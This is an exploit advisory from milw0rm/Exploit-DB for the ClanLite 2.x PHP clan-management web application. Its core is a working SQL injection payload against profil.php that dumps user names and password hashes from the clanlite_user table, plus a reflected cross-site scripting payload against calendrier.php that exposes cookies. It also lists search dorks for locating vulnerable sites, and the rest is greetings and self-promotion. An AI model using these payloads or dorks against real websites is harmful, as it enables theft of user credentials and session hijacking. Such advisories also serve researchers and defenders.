ClanLite 2.x - SQL Injection / Cross-Site Scripting

EDB-ID:

5595

Author:

ZoRLu

Type:

webapps

Platform:

PHP

Published:

2008-05-12

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

ClanLite V2 SQL inj. & XSS

dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005

dork: Themed By Ray © 2003, 2004 iOptional 

readme script

/****************************************************************************
 *	Fichier		: 															*
 *	Copyright	: (C) 2004 ClanLite V2											*
 *	Email		: support@clanlite.org										*
 *																			*
 *   This program is free software; you can redistribute it and/or modify	*
 *   it under the terms of the GNU General Public License as published by	*
 *   the Free Software Foundation; either version 2 of the License, or		*
 *   (at your option) any later version.									*
 ***************************************************************************/
   
 author: ZoRLu 

   home: ( yildirimordulari.org ) ( z0rlu.ownspace.org ) ( milw0rm.org ) ( r00tsecurity.org ) ( securityfocus.com ) 

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )

    Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da  :((

    Not: http://www.z0rlu.ownspace.org   acIklarIn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

http://localhost/clanlite_path/service/profil.php?link=[SQL]


[SQL]=

ZoRLu'/**/union/**/select/**/null,null,mail,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,0x3a,psw),null,null,null/**/from/**/clanlite_user/*


[XSS]=

http://localhost/clanlite/service/calendrier.php?mois=6&annee="><script>alert(document.cookie)</script>


########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, bLaCk, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK,

kasIrga(lavrens), w3R3m, avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti  :(((

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

# milw0rm.com [2008-05-12]